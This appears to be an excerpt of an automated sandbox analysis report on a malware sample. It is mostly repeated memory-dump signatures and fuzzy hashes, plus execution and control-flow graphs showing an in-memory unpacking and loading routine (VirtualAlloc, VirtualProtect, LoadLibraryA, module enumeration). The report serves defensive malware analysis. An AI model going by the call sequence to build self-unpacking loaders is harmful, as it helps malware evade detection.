                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f007972dc6458150ae3564b894ffdf92b43c24c2ec856cae48ab5692f0cf63c9
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CB0123004020FCFC5016F68FC1BA4C372CD6443187404125A50C0B111E9B82885869D
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4280896944
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b10fb060e1abafe7662a911977e1182d5fba92523e0dc6e2d7cd6826018a3389
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 61653677697f43d9e2b7ed4010ef91d0ffb917fe4167f18c0d169e124b48d944
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b10fb060e1abafe7662a911977e1182d5fba92523e0dc6e2d7cd6826018a3389
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4D19230300701ABE705A7B5ACA3ABD76BBFB86704B90442C86055FBA0DF75BD0997D6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4280896944
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32e95d563e8eaf21c5fda144de045c69824837d0057830fa1f1a45b81d54d301
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 59823ef5d3328f9b1e1c6b88df8e8039b1837292e805f36496d707838fd640f2
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32e95d563e8eaf21c5fda144de045c69824837d0057830fa1f1a45b81d54d301
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AD18030300B01ABE705ABB5ACA3ABD757BBB86704B90443C96045FBA0DF71BD0997D6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1616568641
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 653882585306d21472273a0558b4c863bed72d40ddb204260c2fb78f5faa4266
                                                                                                                                                                                                                                                                                                                  • Instruction ID: c0ab1a455fe8d20887842c68a2a31e45412c7bfb06f869aa6cc85dca11ece3db
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 653882585306d21472273a0558b4c863bed72d40ddb204260c2fb78f5faa4266
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C64153303007006BE306A7B5A8726BD7ABAFB86704B90443C96085FBA0DF757D1997D7
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1616568641
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e3c2c71bb76f66410c60828276914f785a74247cf8c12cdb9195bbcf5009c75
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7e5c46d4a4f080ae9d89239ae5dbb146d737ee14c6a7cf1f773cbbf4646bf375
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e3c2c71bb76f66410c60828276914f785a74247cf8c12cdb9195bbcf5009c75
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 054162303006016BE305A7B5A873ABD75BAFB8A704B90443C96085FBA0DF75BD1997D7
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2006137550
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 221bb1b754842bd464985aa15f73bf66b1e21b36b2c53e9a9cf3724d05b3cbd2
                                                                                                                                                                                                                                                                                                                  • Instruction ID: fa702bbeed2cd43573a451bc85f7ed895ae2f9d07ae217506b657cf9d369792e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 221bb1b754842bd464985aa15f73bf66b1e21b36b2c53e9a9cf3724d05b3cbd2
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 393181303007006BE705ABB5A872AFDBA7AFB86708B90453C96045FBA1DF757D0987D6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2006137550
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6f771eb5bc40e9fc8a60cee0f1544c60260615ffa3c4d5fbeffbd5cf5560396f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcb8da775274d7fa669a3c02c15ec538da66fb6c0a3e52b7361fa180a31031cd
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f771eb5bc40e9fc8a60cee0f1544c60260615ffa3c4d5fbeffbd5cf5560396f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E82184303007006BE705ABB5A872BBDB67AFB86708B90453C96085FBA1DF757D0983D6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4029772214
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86143e0d5165b11ed23216a3d83da8a29207f32e698784a0c44362304572a5be
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 49903de36f6cc92806c3f520153b7cf20551423747715ee6298768abdedf86e4
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86143e0d5165b11ed23216a3d83da8a29207f32e698784a0c44362304572a5be
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B31B430300642AFEB056BB5E8679BD7B76FB87304710452CD6058F6A5CE716D4ACB86
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4029772214
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6431673b691e13791eee54fe604c2daac8a86f37b680eaec2bbe20217ee11698
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7c0001151a9b8d01293022d2b531b4865bb33487208a2ca7d410af140ec017a2
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6431673b691e13791eee54fe604c2daac8a86f37b680eaec2bbe20217ee11698
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3421A130300606AFEB056BB5E9679BD7B7AFB86304710443CE6054F6A5CE716D4ACBC6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-527143322
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86fb9eebd09acf95c999f1a56a6a526c6ebd13263b62ebfb2d40bbfd02f93706
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f3a9b991348036a0ab1b94cfd0744bcfaa205b026bcce1a4d85eb4f09937dca
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86fb9eebd09acf95c999f1a56a6a526c6ebd13263b62ebfb2d40bbfd02f93706
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6321B5303007006BE705A7B59863ABD7B7AFB86704B50452C96055F7A0CF727D1987D2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Dl$Dl$Dl$Dl$Dl$Dl
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-527143322
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8450ae2930452af6f1981f652362ce10eae6faf291cbc476661503f52d568384
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8d72ba667e97ff4563ce709ed580645c4348d78f07e5a172d9e0fe47d59b6c9c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8450ae2930452af6f1981f652362ce10eae6faf291cbc476661503f52d568384
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 471193303007106BE705A7B5A862ABDBA7FFB86B04B90453C92055FBA0DF727D1983D6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                  Execution Coverage:4.8%
                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:62.8%
                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                  Total number of Nodes:43
                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:3
                                                                                                                                                                                                                                                                                                                  execution_graph 8722 42cf90 8723 42dd00 8722->8723 8726 42c9a0 8723->8726 8728 42c9c8 GlobalAlloc 8726->8728 8729 42cd17 8728->8729 8735 42c370 8729->8735 8731 42ce24 8732 42ce57 GlobalFlags LocalSize 8731->8732 8733 42ce7b LoadLibraryA 8731->8733 8732->8731 8734 42ce96 8733->8734 8736 42c3a2 VirtualProtect 8735->8736 8736->8731 8738 411915 8739 411921 8738->8739 8740 41194f RtlAllocateHeap 8739->8740 8741 41192d 8739->8741 8740->8739 8740->8741 8742 9be31c 8745 9be32d 8742->8745 8746 9be33c 8745->8746 8749 9beacd 8746->8749 8750 9beae8 8749->8750 8751 9beaf1 CreateToolhelp32Snapshot 8750->8751 8752 9beb0d Module32First 8750->8752 8751->8750 8751->8752 8753 9beb1c 8752->8753 8755 9be32c 8752->8755 8756 9be78c 8753->8756 8757 9be7b7 8756->8757 8758 9be7c8 VirtualAlloc 8757->8758 8759 9be800 8757->8759 8758->8759 8759->8759 8760 96003c 8761 960049 8760->8761 8773 960e0f SetErrorMode SetErrorMode 8761->8773 8766 960265 8767 9602ce VirtualProtect 8766->8767 8769 96030b 8767->8769 8768 960439 VirtualFree 8772 9604be LoadLibraryA 8768->8772 8769->8768 8771 9608c7 8772->8771 8774 960223 8773->8774 8775 960d90 8774->8775 8776 960dad 8775->8776 8777 960dbb GetPEB 8776->8777 8778 960238 VirtualAlloc 8776->8778 8777->8778 8778->8766 8779 40b19b HeapCreate

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 42c9a0-42c9dc 2 42c9de-42c9e4 0->2 3 42c9f2-42c9fc 2->3 4 42c9e6-42c9ea 2->4 5 42ca4b-42ca51 3->5 6 42c9fe-42ca44 3->6 4->3 7 42ca53-42ca5b 5->7 8 42ca6a-42ca71 5->8 6->5 7->8 11 42ca5d-42ca68 7->11 8->2 9 42ca77 8->9 13 42caad-42cab7 9->13 11->8 12 42ca79-42ca80 11->12 12->13 14 42ca82-42caa5 12->14 16 42cc9b-42cca9 13->16 17 42cabd-42cb0d 13->17 14->13 18 42ccb0-42ccb6 16->18 44 42cb0f-42cb19 17->44 45 42cb1c-42cb8e 17->45 20 42ccc3-42cccd 18->20 21 42ccb8-42ccbd 18->21 24 42cccf-42cce8 20->24 25 42ccec-42ccf3 20->25 21->20 24->25 25->18 26 42ccf5-42cd11 GlobalAlloc 25->26 29 42cd17-42cd29 26->29 30 42cdb5-42cdbb 26->30 33 42cd30-42cd35 29->33 34 42cdc0-42cdc3 30->34 36 42cd37-42cd76 33->36 37 42cd7d-42cd8a call 42c420 33->37 38 42cdc5-42cde5 34->38 39 42cdea-42cdeb 34->39 36->37 49 42cdac-42cdaf 37->49 50 42cd8c-42cda7 37->50 38->39 39->34 41 42cded-42cdfd 39->41 48 42ce00-42ce0b 41->48 44->45 75 42cba2-42cc05 45->75 76 42cb90-42cb9f 45->76 51 42ce16-42ce17 48->51 52 42ce0d-42ce11 48->52 49->30 49->33 50->49 51->48 53 42ce19-42ce3d call 42c370 call 42c730 51->53 52->51 67 42ce40-42ce4a 53->67 68 42ce57-42ce65 GlobalFlags LocalSize 67->68 69 42ce4c-42ce53 67->69 71 42ce72-42ce79 68->71 72 42ce67-42ce6c 68->72 69->68 71->67 74 42ce7b-42ce90 LoadLibraryA 71->74 72->71 77 42ce96-42cf69 74->77 78 42cf74-42cf8b 74->78 79 42cc52-42cc98 75->79 80 42cc07-42cc0b 75->80 76->75 77->78 79->16 83 42cc49-42cc4f 80->83 84 42cc0d-42cc1c 80->84 83->79 90 42cc27-42cc3d 84->90 91 42cc1e-42cc21 84->91 90->83 96 42cc3f-42cc45 90->96 91->90 93 42cc23-42cc24 91->93 93->90 96->83
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000000,007B7674), ref: 0042CCFD
                                                                                                                                                                                                                                                                                                                  • GlobalFlags.KERNEL32(00000000), ref: 0042CE59
                                                                                                                                                                                                                                                                                                                  • LocalSize.KERNEL32(00000000), ref: 0042CE5D
                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(004040A0), ref: 0042CE80
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635212560.000000000042C000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0042C000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_42c000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Global$AllocFlagsLibraryLoadLocalSize
                                                                                                                                                                                                                                                                                                                  • String ID: (H7$8F@$LF@
                                                                                                                                                                                                                                                                                                                  • API String ID: 2181924483-3464654758
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c7f6b99603b84bfbba7c194f3bdd3e46480b5e7f9101ab015c440ef38099e7e6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8dd8897d81b8e744862d12ce84aa735a9be2d98844e96445829dbb608474daf8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7f6b99603b84bfbba7c194f3bdd3e46480b5e7f9101ab015c440ef38099e7e6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47F1A4B16483809FD320DF64DD85F9EB7E4BB84704F50452EF689A72E0DBB86844CB5A
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 107 96003c-960047 108 96004c-960263 call 960a3f call 960e0f call 960d90 VirtualAlloc 107->108 109 960049 107->109 124 960265-960289 call 960a69 108->124 125 96028b-960292 108->125 109->108 130 9602ce-9603c2 VirtualProtect call 960cce call 960ce7 124->130 127 9602a1-9602b0 125->127 129 9602b2-9602cc 127->129 127->130 129->127 136 9603d1-9603e0 130->136 137 9603e2-960437 call 960ce7 136->137 138 960439-9604b8 VirtualFree 136->138 137->136 140 9605f4-9605fe 138->140 141 9604be-9604cd 138->141 144 960604-96060d 140->144 145 96077f-960789 140->145 143 9604d3-9604dd 141->143 143->140 147 9604e3-960505 143->147 144->145 150 960613-960637 144->150 148 9607a6-9607b0 145->148 149 96078b-9607a3 145->149 158 960517-960520 147->158 159 960507-960515 147->159 151 9607b6-9607cb 148->151 152 96086e-9608be LoadLibraryA 148->152 149->148 153 96063e-960648 150->153 155 9607d2-9607d5 151->155 157 9608c7-9608f9 152->157 153->145 156 96064e-96065a 153->156 160 9607d7-9607e0 155->160 161 960824-960833 155->161 156->145 162 960660-96066a 156->162 165 960902-96091d 157->165 166 9608fb-960901 157->166 167 960526-960547 158->167 159->167 168 9607e4-960822 160->168 169 9607e2 160->169 164 960839-96083c 161->164 163 96067a-960689 162->163 170 960750-96077a 163->170 171 96068f-9606b2 163->171 164->152 172 96083e-960847 164->172 166->165 173 96054d-960550 167->173 168->155 169->161 170->153 174 9606b4-9606ed 171->174 175 9606ef-9606fc 171->175 176 96084b-96086c 172->176 177 960849 172->177 179 960556-96056b 173->179 180 9605e0-9605ef 173->180 174->175 183 9606fe-960748 175->183 184 96074b 175->184 176->164 177->152 181 96056f-96057a 179->181 182 96056d 179->182 180->143 185 96057c-960599 181->185 186 96059b-9605bb 181->186 182->180 183->184 184->163 191 9605bd-9605db 185->191 186->191 191->173
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0096024D
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635807336.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_960000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ff9c9a286429b8ce8c70ef976112e265353551da9dbdfe080130b5d1aeb8eb2
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C526774A00229DFDB64CF68C985BADBBB1BF49304F1480D9E94DAB251DB34AE84DF14
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 192 9beacd-9beae6 193 9beae8-9beaea 192->193 194 9beaec 193->194 195 9beaf1-9beafd CreateToolhelp32Snapshot 193->195 194->195 196 9beaff-9beb05 195->196 197 9beb0d-9beb1a Module32First 195->197 196->197 203 9beb07-9beb0b 196->203 198 9beb1c-9beb1d call 9be78c 197->198 199 9beb23-9beb2b 197->199 204 9beb22 198->204 203->193 203->197 204->199
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009BEAF5
                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 009BEB15
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2636286578.00000000009B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009B9000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_9b9000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: cdda93f6ff205a145d7894d2ba335495bf6533e05dcc6dd70c5b49dce78f3c1d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF062361007256BD7203BF6A98DBEAB6ECBF49735F100528F643D14C0DA70EC458A61
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 205 960e0f-960e24 SetErrorMode * 2 206 960e26 205->206 207 960e2b-960e2c 205->207 206->207
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00960223,?,?), ref: 00960E19
                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00960223,?,?), ref: 00960E1E
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635807336.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_960000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 676f75e26b49f28fc6824eb9c84afbad57dbdb52f3cc4faad1469df3b8e6cb83
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43D01232645228B7DB012A94DC09BCEBB1CDF09BA2F008421FB0DE9080CBB19A4046EA
